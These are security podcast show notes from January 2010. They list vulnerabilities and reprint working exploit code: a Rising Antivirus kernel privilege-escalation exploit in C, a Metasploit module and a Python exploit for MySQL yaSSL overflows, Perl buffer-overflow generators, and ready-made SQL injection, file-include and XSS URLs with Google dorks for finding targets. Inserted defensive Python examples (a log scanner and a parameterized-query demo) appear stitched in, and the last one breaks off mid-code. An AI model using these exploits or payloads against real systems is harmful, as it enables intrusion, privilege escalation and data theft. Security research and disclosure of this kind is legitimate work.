2010
01.29

Episode 57 – HDD Phasers

InfoSec Daily Podcast

InfoSec Podcast Episode 57 for January 29, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
FORENSICS 606: Drive and Data Recovery Forensics    Canceled

Vulnerabilities of Interest:

  1. FUSE is subject to a race-condition vulnerability. Local attackers can exploit this issue to cause a denial of service via symlink attacks involving FUSE shares belonging to a privileged user. NOTE: Successful exploitation requires the attacker to be a member of the 'fuse' group. This can be exploited using readily available tools.
  2. Samba is subject to a local privilege-escalation vulnerability in the ‘mount.cifs’ utility. Local attackers can exploit this issue to gain elevated privileges on affected computers. This can be exploited using readily available tools.
  3. The ‘com_ccnewsletter’ component for Joomla! is subject to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL: http://www.sample.com/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 Google Dork: inurl: index.php?option=com_ccnewsletter
  4. Rising Antivirus is subject to multiple local privilege-escalation vulnerabilities that affect various drivers. An attacker can exploit these issues to execute arbitrary code with elevated privileges, facilitating a complete compromise of the affected computer. Rising Antivirus 2008 and Rising Antivirus 2009 are vulnerable.  Exploit code is available:
    // Rising0day.cpp : Defines the entry point for the console application.
    //
    #include "stdafx.h"
    #include "windows.h"

    enum { SystemModuleInformation = 11 };

    typedef struct {
        ULONG Unknown1;
        ULONG Unknown2;
        PVOID Base;
        ULONG Size;
        ULONG Flags;
        USHORT Index;
        USHORT NameLength;
        USHORT LoadCount;
        USHORT PathLength;
        CHAR ImageName[256];
    } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

    typedef struct {
        ULONG Count;
        SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
    } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

    HANDLE g_RsGdiHandle = 0;

    void __stdcall WriteKVM(PVOID Address, ULONG Value)
    {
        ULONG ColorValue = Value;
        ULONG btr;
        ULONG ColorBuffer = 0;

        DeviceIoControl(g_RsGdiHandle,
                        0x83003C0B,
                        &ColorValue,
                        sizeof(ULONG),
                        &ColorBuffer,
                        sizeof(ULONG),
                        &btr,
                        0);
        DeviceIoControl(g_RsGdiHandle,
                        0x83003C0B,
                        &ColorValue,
                        sizeof(ULONG),
                        Address,
                        sizeof(ULONG),
                        &btr,
                        0);
        return;
    }

    void AddCallGate()
    {
        ULONG Gdt_Addr;
        ULONG CallGateData[0x4];
        ULONG Icount;
        __asm
        {
            push edx
            sgdt [esp-2]
            pop edx
            mov Gdt_Addr, edx
        }
        __asm
        {
            push 0xc3
            push Gdt_Addr
            call WriteKVM
            mov eax, Gdt_Addr
            mov word ptr [CallGateData], ax
            shr eax, 16
            mov word ptr [CallGateData+6], ax
            mov dword ptr [CallGateData+2], 0x0ec0003e8
            mov dword ptr [CallGateData+8], 0x0000ffff
            mov dword ptr [CallGateData+12], 0x00cf9a00
            xor eax, eax
        LoopWrite:
            mov edi, dword ptr CallGateData[eax]
            push edi
            mov edi, Gdt_Addr
            add edi, 0x3e0
            add edi, eax
            push edi
            mov Icount, eax
            call WriteKVM
            mov eax, Icount
            add eax, 0x4
            cmp eax, 0x10
            jnz LoopWrite
        }

        return;
    }

    void IntoR0(PVOID function)
    {
        WORD Callgt[3];
        Callgt[0] = 0;
        Callgt[1] = 0;
        Callgt[2] = 0x3e3;
        __asm
        {
            call fword ptr [Callgt]
            mov eax, esp
            mov esp, [esp+4]
            push eax
            call function
            pop esp
            push offset ring3Ret
            retf
        ring3Ret:
            nop
        }
        return;
    }

    #pragma pack(1)
    typedef struct _IDTR
    {
        SHORT IDTLimit;
        UINT IDTBase;
    } IDTR, *PIDTR, **PPIDTR;
    #pragma pack()

    ULONG g_RealSSDT = 0;
    ULONG ServiceNum = 0;
    ULONG OrgService[0x1000];

    ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)
    {
        ULONG Offset = Rva, Limit;
        IMAGE_SECTION_HEADER *Img;
        WORD i;

        Img = IMAGE_FIRST_SECTION(NT);

        if (Rva < Img->PointerToRawData)
            return Rva;

        for (i = 0; i < NT->FileHeader.NumberOfSections; i++)
        {
            if (Img[i].SizeOfRawData)
                Limit = Img[i].SizeOfRawData;
            else
                Limit = Img[i].Misc.VirtualSize;

            if (Rva >= Img[i].VirtualAddress &&
                Rva < (Img[i].VirtualAddress + Limit))
            {
                if (Img[i].PointerToRawData != 0)
                {
                    Offset -= Img[i].VirtualAddress;
                    Offset += Img[i].PointerToRawData;
                }

                return Offset;
            }
        }

        return 0;
    }

    #define ibaseDD *(PDWORD)&ibase
    DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)
    {
        PIMAGE_DOS_HEADER mzhead = (PIMAGE_DOS_HEADER)ibase;
        if ((mzhead->e_magic != IMAGE_DOS_SIGNATURE) || (ibaseDD[mzhead->e_lfanew] != IMAGE_NT_SIGNATURE)) return FALSE;
        *pfh = (PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
        if (((PIMAGE_NT_HEADERS)*pfh)->Signature != IMAGE_NT_SIGNATURE) return FALSE;
        *pfh = (PIMAGE_FILE_HEADER)((PBYTE)*pfh + sizeof(IMAGE_NT_SIGNATURE));
        *poh = (PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh + sizeof(IMAGE_FILE_HEADER));
        if ((*poh)->Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;
        *psh = (PIMAGE_SECTION_HEADER)((PBYTE)*poh + sizeof(IMAGE_OPTIONAL_HEADER));
        return TRUE;
    }

    typedef struct {
        WORD offset:12;
        WORD type:4;
    } IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

    #define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

    DWORD FindKiServiceTable(HMODULE hModule, DWORD dwKSDT, PULONG ImageBase)
    {
        PIMAGE_FILE_HEADER pfh;
        PIMAGE_OPTIONAL_HEADER poh;
        PIMAGE_SECTION_HEADER psh;
        PIMAGE_BASE_RELOCATION pbr;
        PIMAGE_FIXUP_ENTRY pfe;

        DWORD dwFixups = 0, i, dwPointerRva, dwPointsToRva, dwKiServiceTable;
        BOOL bFirstChunk;

        GetHeaders((PCHAR)hModule, &pfh, &poh, &psh);

        if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
            (!((pfh->Characteristics) & IMAGE_FILE_RELOCS_STRIPPED))) {

            pbr = (PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress, hModule);
            bFirstChunk = TRUE;
            while (bFirstChunk || pbr->VirtualAddress) {
                bFirstChunk = FALSE;

                pfe = (PIMAGE_FIXUP_ENTRY)((DWORD)pbr + sizeof(IMAGE_BASE_RELOCATION));

                for (i = 0; i < (pbr->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1; i++, pfe++) {
                    if (pfe->type == IMAGE_REL_BASED_HIGHLOW) {
                        dwFixups++;
                        dwPointerRva = pbr->VirtualAddress + pfe->offset;
                        dwPointsToRva = *(PDWORD)((DWORD)hModule + dwPointerRva) - (DWORD)poh->ImageBase;

                        if (dwPointsToRva == dwKSDT)
                        {
                            if (*(PWORD)((DWORD)hModule + dwPointerRva - 2) == 0x05c7)
                            {
                                dwKiServiceTable = *(PDWORD)((DWORD)hModule + dwPointerRva + 4) - poh->ImageBase;
                                *ImageBase = poh->ImageBase;
                                return dwKiServiceTable;
                            }
                        }
                    }
                }
                *(PDWORD)&pbr += pbr->SizeOfBlock;
            }
        }

        return 0;
    }

    DWORD CR0Reg;
    ULONG realssdt;

    void InKerneProc()
    {
        __asm
        {
            cli
            mov eax, cr0
            mov CR0Reg, eax
            and eax, 0xFFFEFFFF
            mov cr0, eax
        }
        int i;
        for (i = 0; i < (int)ServiceNum; i++)
        {
            *(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService[i];
        }
        __asm
        {
            mov eax, CR0Reg
            mov cr0, eax
            sti
        }
    }

    int main(int argc, char* argv[])
    {
        printf("Rising AntiVirus 2008 ~ 2010 \n"
               "Local Privilege Escalation Vulnerability Proof Of Concept Exploit\n 2010-1-27\n");

        g_RsGdiHandle = CreateFile("\\\\.\\RSNTGDI",
                                   0,
                                   FILE_SHARE_READ | FILE_SHARE_WRITE,
                                   0,
                                   OPEN_EXISTING, 0, 0);
        if (g_RsGdiHandle == INVALID_HANDLE_VALUE)
        {
            return 0;
        }

        SYSTEM_MODULE_INFORMATION ModuleInfo;

        // Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and its base address

        HMODULE hlib = GetModuleHandle("ntdll.dll");
        PVOID pNtQuerySystemInformation = GetProcAddress(hlib, "NtQuerySystemInformation");
        ULONG infosize = sizeof(ModuleInfo);

        __asm
        {
            push 0
            push infosize
            lea eax, ModuleInfo
            push eax
            push 11
            call pNtQuerySystemInformation
        }

        HMODULE KernelHandle;
        LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

        // Load the kernel image specified
        KernelHandle = LoadLibrary(ntosname);
        if (KernelHandle == 0)
        {
            return 0;
        }

        ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle, "KeServiceDescriptorTable");

        if (KeSSDT == 0)
        {
            return 0;
        }
        ULONG ImageBase = 0;
        ULONG KiSSDT = FindKiServiceTable(KernelHandle, KeSSDT - (ULONG)KernelHandle, &ImageBase);
        if (KiSSDT == 0)
        {
            return 0;
        }
        KiSSDT += (ULONG)KernelHandle;
        ServiceNum = 0x11c;
        ULONG i;

        for (i = 0; i < ServiceNum; i++)
        {
            OrgService[i] = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;
        }

        realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

        SetThreadAffinityMask(GetCurrentThread(), 0);

        AddCallGate();
        IntoR0(InKerneProc);
        return 0;
    }

  5. Discuz! is subject to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Discuz! 6.0.0 is vulnerable; other versions may also be affected. Example URL: http://www.sample.com/bbs/viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal Error</h1></marquee> Google Dork: inurl: /bbs/viewthread.php?
  6. KOL WaveIOX 1.04 is subject to a local buffer overflow when handling .wav files because the application fails to perform adequate bounds checks. Exploit code is available:
    #!/usr/bin/perl
    #########################################################
    ## Usage -->> file created -->> load file -->> b00m.wav
    ## >>> BOOM
    #########################################################

    print "#####################################################\n";
    print "[!] KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC\n";
    print "\n";
    print "[!] Author: cr4wl3r\n";
    print "[!] Mail: cr4wl3r[!]linuxmail.org\n";
    print "#####################################################\n";

    my $boom = "http://" . "\x41" x 1337;
    my $filename = "b00m.wav";
    open(FILE, ">$filename") or die "Cannot open $filename: $!";
    print FILE "$boom";
    close(FILE);
    print "\nFile successfully created!\n";

  7. KOL Wave Player 1.0 is subject to a local buffer overflow when handling .wav files because the application fails to perform adequate bounds checks. Exploit code is available:
    #!/usr/bin/perl
    #########################################################
    ## Usage -->> file created -->> load file -->> b00m.wav
    ## >>> BOOM
    #########################################################

    print "#####################################################\n";
    print "[!] KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC\n";
    print "\n";
    print "[!] Author: cr4wl3r\n";
    print "[!] Mail: cr4wl3r[!]linuxmail.org\n";
    print "#####################################################\n";

    my $boom = "http://" . "\x41" x 1337;
    my $filename = "b00m.wav";
    open(FILE, ">$filename") or die "Cannot open $filename: $!";
    print FILE "$boom";
    close(FILE);
    print "\nFile successfully created!\n";
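
The com_ccnewsletter (item 3) and Discuz! (item 5) entries above share one detection problem: the payload arrives URL-encoded, and on this page the XSS example is additionally HTML-entity encoded, so a log-side check has to normalise before it matches anything. The following is an added example in Python, not code from the podcast or from either project. The access-log lines are constructed to mirror the example URLs above, with invented client addresses and a made-up `alert(1)` body; the regular expressions are this example's own choices, not a published signature set.

```python
"""Flag traversal/null-byte and script-injection attempts in web access logs.

Added example for the Joomla! com_ccnewsletter and Discuz! items; the sample
log, the host names and the client addresses below are constructed.
"""
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Common Log Format lines patterned on the page's example URLs.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Jan/2010:10:01:02 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1523
10.0.0.6 - - [29/Jan/2010:10:01:07 -0500] "GET /bbs/viewthread.php?tid=%22%3E%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 812
10.0.0.7 - - [29/Jan/2010:10:01:09 -0500] "GET /index.php?option=com_ccnewsletter&controller=newsletter HTTP/1.1" 200 4420
10.0.0.8 - - [29/Jan/2010:10:01:11 -0500] "GET /bbs/viewthread.php?tid=1234 HTTP/1.1" 200 9001
"""

# Request line inside the quotes: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A ".." path component, with either slash style, at the start or after a separator.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
# Common markup/event-handler markers of reflected script injection.
SCRIPT_RE = re.compile(
    r'<\s*/?\s*(script|iframe|img|svg|marquee)\b|\bon\w+\s*=|javascript:', re.I)


def normalize(value):
    """Undo stacked URL encoding and HTML entities, a bounded number of times.

    parse_qsl already decodes one layer; attackers stack more (%252e -> %2e -> .)
    and the page's own XSS example is entity-encoded, so decode until stable.
    """
    prev, cur = None, value
    for _ in range(3):          # bounded so a hostile value cannot spin us
        if cur == prev:
            break
        prev = cur
        cur = html.unescape(unquote(cur))
    return cur


def classify_param(name, value):
    """Return the list of indicators found in one query parameter value."""
    v = normalize(value)
    findings = []
    if "\x00" in v:
        findings.append("null-byte")       # classic include-truncation trick
    if TRAVERSAL_RE.search(v):
        findings.append("traversal")
    if SCRIPT_RE.search(v):
        findings.append("xss")
    return findings


def scan_line(line):
    """Return [(param_name, [indicators...]), ...] for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        tags = classify_param(name, value)
        if tags:
            findings.append((name, sorted(set(tags))))
    return findings


def scan_log(text):
    """Map 1-based line number -> findings, for suspicious lines only."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            report[n] = hits
    return report


if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        print("line %d: %s" % (n, hits))
```

Treat hits as triage leads rather than verdicts: a legitimate parameter can contain `..`, and the marker list is deliberately short. The value of the example is the normalisation step; a matcher that skips it misses both `%252e%252e%2f` and the entity-encoded form of the payload.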


News Items of Interest:

News item 1:  http://www.scmagazineus.com/popularity-of-apple-devices-draws-malware-report/article/162331/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SCMagazineNews+%28SC+Magazine+News%29
Amid speculation that Apple is set to introduce its tablet device tomorrow at a press event in California, a discussion of the security implications will not likely be a part of the hoopla. While the device is already being touted as a game-changer in the publishing industry, reportedly introducing a new digital platform with a 10-inch screen for the delivery of newspaper and magazine content, what’s likely to follow within months of the debut, if history is any precedent, is a new wave of malware targeting the device. Users tuning in for their daily news feed or perusing copies of their favorite magazines may become victims of new iterations of malware likely intended to make off with their passwords and personal information to then be offered for sale in the nether regions of cyberspace.
News item 2: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3211248
A virus that was created as a prank targeting an off-road Slovakian motorcycle club is causing an issue for web users across the world. Security company ESET said the Windows-borne 'Zimuse' is a retro oddity because it attacks the hard disk master boot record (MBR) of any attached drive it finds, a technique common in viruses from nearly 20 years ago. As with viruses of old, its spread is aided by its ability to infect the modern equivalent of floppy disks, USB sticks. Delivered via a bogus IQ test program or through an infected website, Zimuse fills the first 50Kb of each disk's MBR with zeroes, rendering
News item 3: http://www.v3.co.uk/v3/news/2256845/cybercrime-taken-seriously

Cyber crime is not being treated properly or taken sufficiently seriously by the police, according to a new study from the University of Leicester.

The study analysed the policing of the internet, and raised a number of concerns about police attitudes to the growing menace. Public Policing and Internet Crime, written by Professor Yvonne Jewkes of Leicester’s Department of Criminology, highlighted a general unwillingness to investigate cyber crimes, and warned that even when they are investigated, it is rarely through co-operation between different organisations or across geographical boundaries.
News item 4: http://nmap.org
Nmap 5.21 released.  Fixed an error that occurred when UDP scan was combined with version scan. UDP ports would appear in the state “unknown” at the end of the scan, and in some cases an assertion failure would be raised. This was an unintended side effect of the memory use reduction changes in 5.20.

Technical Segment: http://www.myharddrivedied.com/sans.html
Presentation:  http://www.myharddrivedied.com/diy-data-recovery.pdf

2010
01.28

Episode 56 – Barcode Fun

InfoSec Daily Podcast

InfoSec Podcast Episode 56 for January 28, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:

FORENSICS-606: Drive and Data Recovery Forensics (Canceled)

Louisville OWASP Chapter – Fourth Meeting, Friday January 29th, 2010

Please Note:  RSVP Required! The meeting location this quarter has a capacity of 40 persons.  Please send your RSVP as soon as possible to ensure a seat and lunch.  We apologize for any inconvenience this may cause and are seeking a larger venue for future meetings.

To RSVP: Just send a reply to brian.r.blankenship@gmail.com and indicate how many are coming.

Date/Time: January 29th, 11:30 – 1:00PM
Location: MetroSafe Building, 410 S. Fifth Street. (there is a parking lot across the street, and a parking garage 1/2 block away).

Lunch is being provided by Imperva and Accuvant.

Speaker: Rafal Los will be discussing Flash and Web 2.0 security (see bio below)

“Rafal Los, Security Specialist with Hewlett-Packard’s Application Security Center (ASC), is an industry veteran who has worked in a variety of security positions — from consultant to Information Security Officer in the Fortune 100 — within some of the most demanding business environments. Rafal’s unique blend of technical expertise and business knowledge enables him to teach audiences about security techniques, programs and processes that they can both understand strategically and realistically apply. He has extensive experience in security testing, risk analysis and management, penetration testing and architecture and policy. Previous successes include building and implementing a successful web application security program for one of the largest and most diverse companies in the world.”
Vulnerabilities of Interest:

  1. yaSSL is subject to multiple remote buffer-overflow vulnerabilities. Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of applications using the library. Failed attacks will cause denial-of-service conditions. yaSSL 1.7.5 is vulnerable to these issues; other versions are also likely to be affected. Proof-of-concept and exploit code are available:
    ##
    # $Id: mysql_yassl_hello.rb 8242 2010-01-26 20:12:13Z jduck $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
        Rank = AverageRanking

        include Msf::Exploit::Remote::Tcp

        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'MySQL yaSSL SSL Hello Message Buffer Overflow',
                'Description'    => %q{
                    This module exploits a stack overflow in the yaSSL (1.7.5 and earlier)
                    implementation bundled with MySQL <= 6.0. By sending a specially crafted
                    Hello packet, an attacker may be able to execute arbitrary code.
                },
                'Author'         => [ 'MC' ],
                'License'        => MSF_LICENSE,
                'Version'        => '$Revision: 8242 $',
                'References'     =>
                    [
                        [ 'CVE', '2008-0226' ],
                        [ 'OSVDB', '41195'],
                        [ 'BID', '27140' ],
                    ],
                'Privileged'     => true,
                'DefaultOptions' =>
                    {
                        'EXITFUNC' => 'thread',
                    },
                'Payload'        =>
                    {
                        'Space'           => 600,
                        'BadChars'        => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c",
                        'StackAdjustment' => -3500,
                        'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff",
                    },
                'Platform'       => 'win',
                'Targets'        =>
                    [
                        [ 'MySQL 5.0.45-community-nt', { 'Ret' => 0x008b9d45 } ],
                        [ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ],
                    ],
                'DefaultTarget'  => 0,
                'DisclosureDate' => 'Jan 4 2008'))

            register_options([ Opt::RPORT(3306) ], self)
        end

        def exploit
            connect

            sock.get_once

            req_uno = [0x01000020].pack('V')

            req_dos  = [0x00008daa].pack('V') + [0x40000000].pack('V')
            req_dos << [0x00000008].pack('V') + [0x00000000].pack('V')
            req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
            req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')
            req_dos << [0x03010000].pack('V') + [0x00000001].pack('V')
            req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3917 - payload.encoded.length)
            req_dos << make_nops(100) + payload.encoded + [target.ret].pack('V')
            req_dos << make_nops(16) + [0xe8, -650].pack('CV') + rand_text_alphanumeric(1024)

            print_status("Trying target #{target.name}...")

            sock.put(req_uno)
            sock.put(req_dos)

            handler
            disconnect
        end

    end

  2. MySQL compiled with yaSSL is subject to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. MySQL 5.5.0-ms2 is vulnerable when compiled with yaSSL; other versions may also be affected.
    #!/usr/bin/env python
    #
    # Use this code at your own risk. Never run it against a production system.
    #
    # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
    # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
    # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
    # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
    # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
    # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
    # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

    """
    Usage: mysql_overflo1.py localhost

    MySQL yassl cert parsing stack overflow

    Debug session on 5.5.0-m2

    suse11:~ # gdb -q
    (gdb) att 5542
    Attaching to process 5542
    Reading symbols from /var/mysql/libexec/mysqld...done.

    0xffffe430 in __kernel_vsyscall ()
    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 0xb6bbab90 (LWP 5545)]
    0x41424344 in ?? ()
    (gdb)

    """
    import os
    import getopt
    import sys
    import socket
    import time
    import telnetlib
    import struct
    import base64
    import random

    class theexploit:
        def __init__(self, host):
            self.host = host
            self.port = 3306

        def gettcpsock(self):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            return sock

        def int2berlen(self, i):
            e = self.int2ber(i, signed=0)
            if i <= 127:
                return e
            else:
                l = len(e)
                return chr(0x80 | l) + e

        def int2ber(self, i, signed=1):
            encoded = ''
            while ((signed and (i > 127 or i < -128))
                   or (not signed and (i > 255))):
                encoded = chr(i % 256) + encoded
                i = i >> 8
            encoded = chr(i % 256) + encoded
            return encoded

        def big_endian_24(self, length):
            l1 = (length & 0xff0000) >> 16
            l2 = (length & 0xff00) >> 8
            l3 = length & 0xff
            size = chr(l1) + chr(l2) + chr(l3)
            return size

        def attack_mysql(self):
            sock = self.gettcpsock()
            sock.connect((self.host, self.port))
            #sock.set_timeout(30.0)

            print "press any key"
            sys.stdin.readline()

            s = sock.recv(8000)
            print s

            s  = "\x20\x00\x00\x01\x85\xae\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00"
            s += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            s += "\x00\x00\x00\x00"
            s += "\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1"
            s += "\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5"
            s += "\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39"
            s += "\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f"
            s += "\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12"
            s += "\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06"
            s += "\x00\x03\x02\x01\x00"

            sock.sendall(s)
            print "Sent SSL_CLIENT_HELLO"

            sock.sendall(self.make_overflow())
            print "Sent SSL_CLIENT_CERTIFICATE"
            sock.close()

        def run(self):
            self.attack_mysql()
            return 0

        def make_overflow(self):
            retaddr = 0x41424344
            cn = ""
            cn += "\x00" * 1062
            cn += struct.pack("<L", retaddr) * 6
            #cn += "\x40" * 100
            #cn += "\xcc" * 100
            #cn += "\x40" * 100

            cert = "\x2a\x86\x00\x84" + struct.pack(">L", len(cn)) + cn

            cert = "\x30\x82\x01\x01\x31\x82\x01\x01\x30\x82\x01\x01\x06\x82\x00\x02" + cert

            cert = "\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00" + cert

            cert = "\x30" + self.int2berlen(len(cert)) + cert
            cert = "\x30" + self.int2berlen(len(cert)) + cert

            cert1 = self.big_endian_24(len(cert)) + cert
            certs = self.big_endian_24(len(cert1)) + cert1

            handshake = "\x0b" + self.big_endian_24(len(certs)) + certs
            msg = "\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake

            return msg

    if __name__ == "__main__":
        app = theexploit(sys.argv[1])
        app.run()

  3. PostgreSQL is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application. PostgreSQL 8.0.23 is vulnerable; other versions may also be affected. Proof of concept is available: testdb=# select substring(B'10101010101010101010101010101010101010101010101',33,-15);
  4. VirtueMart is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:

    http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=[SQL]&option=com_virtuemart

    http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=-1%27+UNION+ALL+SELECT+1,username,password,@@version,database%28%29,6+FROM+jos_users%23&option=com_virtuemart

    http://www.sample.com/[JOOMLA_PATH]/1%27%20union%20all%20select%20@@version

  5. MiFi 2352 is subject to an information-disclosure vulnerability that may expose sensitive information. Successful exploits will allow authenticated attackers to obtain passwords, which may aid in further attacks. MiFi 2352 access point firmware 11.47.17 is vulnerable; other versions may also be affected. Example URLs:

    http://www.sample.com/config.xml.sav

    http://www.sample.com/config.xml.save

  6. e107 is subject to an unspecified remote vulnerability. Very little is known about this issue. Versions prior to e107 0.7.17 are vulnerable.  This issue was exploited in an attack against the vendor’s website. Currently we are not aware of any publicly available exploits.
  7. phpYabs is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. phpYabs 0.1.2 is vulnerable; other versions may also be affected. Example URL: http://www.sample.com/phpyabs/moduli/libri/index.php?Azione=[SHELL] Google Dork: inurl: phpyabs/moduli/libri/index.php
  8. The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:

    http://www.sample.com/?newyear=2011'+and+substring(@@version,1,1)=4%23&newmonth=01

    http://www.sample.com/?newyear=2011'+and+substring(@@version,1,1)=5%23&newmonth=01

    http://www.sample.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=4%23

    http://www.sample.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=5%23
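
Items 4 and 8 above (and the F2L-3000 login bypass in episode 55 below) have the same root cause: a request parameter pasted into SQL text. The following added example, not code from VirtueMart, JBDiary or Joomla!, rebuilds the situation on a throwaway SQLite database with constructed tables, then runs the same UNION ALL payload shape as the VirtueMart example URL against a string-built query and against a parameterized one. The `order_status` and `jos_users` columns are invented for the demonstration, and the payload is trimmed to four columns to match them.

```python
"""String-built query versus bound parameters, on the page's UNION ALL payload.

Added example; the schema, rows and table names are constructed and do not
reflect the real VirtueMart or Joomla! database layout.
"""
import sqlite3

# Same shape as the page's VirtueMart example (-1' UNION ALL SELECT ... FROM jos_users#),
# reduced to four columns to match the toy table below. SQLite uses -- for comments.
UNION_PAYLOAD = "-1' UNION ALL SELECT 1,username,password,3 FROM jos_users--"

# Blind boolean probe in the style of the JBDiary example URLs.
BOOLEAN_PAYLOAD = "2' and substring('5',1,1)='5"


def make_db():
    """In-memory SQLite database with constructed data."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
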